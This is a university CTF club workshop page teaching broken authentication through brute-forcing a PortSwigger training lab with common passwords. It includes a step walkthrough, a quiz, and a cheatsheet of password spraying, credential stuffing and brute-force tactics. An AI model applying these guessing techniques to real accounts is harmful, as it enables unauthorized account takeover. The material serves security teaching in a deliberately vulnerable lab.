SPRING 2026 · CTF WORKSHOP SERIES · PSU

Broken
Authentication

If a login system lets you try unlimited passwords or uses weak checks, anyone can break into accounts just by guessing or reusing credentials. We're going to do exactly that.

▶ Start Workshop Skip to Challenge →
SCROLL TO BEGIN
SECTION 01 · LEARNING OBJECTIVES

What You'll Learn

By the end of this workshop, you'll be able to spot and exploit weak login mechanisms—one of the most common entry points for attackers.

01
Identify
Recognize common authentication weaknesses in login systems: lack of rate limiting, weak password policies, and predictable credentials.
02
Bypass
Exploit misconfigured or weak login mechanisms to gain unauthorized access without valid credentials.
03
Exploit
Leverage missing rate limits or guessable passwords to brute-force accounts—just like real attackers do.
SECTION 02 · CORE CONCEPTS

Authentication Failures

Authentication verifies who a user is. When it's weak, attackers can simply imitate legitimate users.

THE PROBLEM
Weak Enforcement
A vulnerability occurs when the authentication process is weak or improperly enforced. Common issues: weak passwords, unlimited login attempts, predictable credentials, or missing verification checks.
THE RULE
Strict Verification
If authentication is not strictly enforced, anyone can become a legitimate user by imitating one. Attackers don't break the system—they take advantage of poor controls.
🔁 REPEATED LOGIN ATTEMPTS · NO RATE LIMIT
ATTEMPT 1 carlos:password123 ✗ Failed
ATTEMPT 2 carlos:qwerty ✗ Failed
ATTEMPT 3 carlos:123456 ✗ Failed
ATTEMPT 4 carlos:password ✓ Success

Repeated login attempts eventually succeed because the system does not limit or properly validate authentication attempts.

SECTION 03 · HOW IT WORKS

The 4‑Step Brute‑Force

How attackers exploit weak authentication—from guessing to full account takeover.

01
Submit login credentials
USER ENTERS USERNAME + PASSWORD
  • Application sends request to server for verification
  • No indication of rate limiting or account lockout
02
Validate credentials weakly
SERVER CHECKS AGAINST STORED VALUES
  • Weak controls allow repeated attempts
  • No CAPTCHA, no delay, no account lockout
03
Attempt multiple logins
ATTACKER GUESSES PASSWORDS REPEATEDLY
  • Try common passwords: 123456, password, qwerty
  • No restrictions or protections stop the attempts
04
Gain unauthorized access
CORRECT CREDENTIALS GUESSED
  • Application grants access without detecting abuse
  • Attacker now operates as the legitimate user
SECTION 04 · DEMO WALKTHROUGH
DEMO.
PortSwigger Lab: Broken authentication (weak password / brute-force)
LAB
Authentication labs
TOOL
Web browser
STATE
Lab launched
▶ SCRIPT
# Step 1: attempt login with common credentials
Username: carlos   Password: password123
→ Expected: login fails (incorrect password)

# Step 2: try another weak/common password
Username: carlos   Password: qwerty / 123456 / password
→ Expected: login eventually succeeds

# Step 3: confirm access
Access account dashboard
→ Expected: user is logged in as carlos
Follow along on your laptop. We will run through this together.
SECTION 05 · COMMON PITFALLS

Troubleshooting

SYMPTOM
Login never succeeds
CAUSEIncorrect username or not following lab instructions
FIXUse exact username provided in the lab
SYMPTOM
Students stop after one failed attempt
CAUSENot realizing multiple attempts are allowed
FIXEncourage repeated guessing of common passwords
SYMPTOM
Students think the attack is unrealistic
CAUSEUnderestimating how often weak passwords are used
FIXEmphasize real‑world use of leaked/guessable credentials
SYMPTOM
Account locked out unexpectedly
CAUSELab variant includes lockout (different lab)
FIXEnsure you're on the weak‑password / no‑rate‑limit lab
SECTION 06 · POP QUIZ

Test Your Knowledge

YOUR SCORE
0 / 5
QUESTION 01 / 05
What is the primary purpose of authentication in a web application?
QUESTION 02 / 05
Which of the following is a sign of broken authentication?
QUESTION 03 / 05
What is the most common way attackers exploit weak authentication?
QUESTION 04 / 05
You try carlos:password and it fails. What should you do next in a lab with no rate limiting?
QUESTION 05 / 05
Which of the following best mitigates brute‑force attacks?
SECTION 07 · YOUR CHALLENGE

Now Do It Yourself

⏱ 5-10 MIN◉ BEGINNER
THE TASK
Use the provided lab to log in to an account by guessing weak or common passwords.
Open PortSwigger Lab
SUCCESS CRITERION
Screenshot showing successful login to the target account.
HINTS
01
Try common passwords that users often reuse.
02
Notice there is no limit on login attempts.
03
Use simple passwords like 123456, password, or qwerty.
CHEATSHEET · BROKEN AUTHENTICATION
ATTACK / PATTERN WHAT IT DOES WHEN TO USE
Password spraying Try a few common passwords against many accounts When account lockout exists but is per‑account
Credential stuffing Use leaked username/password pairs from breaches When users reuse passwords across sites
Brute‑force (no rate limit) Repeatedly guess passwords for a single account When no lockout or CAPTCHA is present
Common passwords Try 123456, password, qwerty, admin Always—first step in any authentication test

📎 Full cheatsheet: Broken_Authentication_Handout.pdf

SECTION 08 · FURTHER READING

Go Deeper

LAB

Username Enumeration via Different Responses

The exact PortSwigger lab used for the Broken Authentication workshop activity.
01

PortSwigger: Authentication

Hands‑on labs demonstrating real authentication flaws and attack techniques.

02

OWASP Top 10: Identification and Authentication Failures

Overview of common authentication weaknesses and their impact.

03

OWASP Authentication Cheat Sheet

Best practices for implementing secure authentication mechanisms.

PDF

Broken Authentication Handout

Full Day 4 workshop handout and quick reference.
Questions?
Bring them to the CTF WhatsApp Group.
CyberTech Club @ PSU · Spring 2026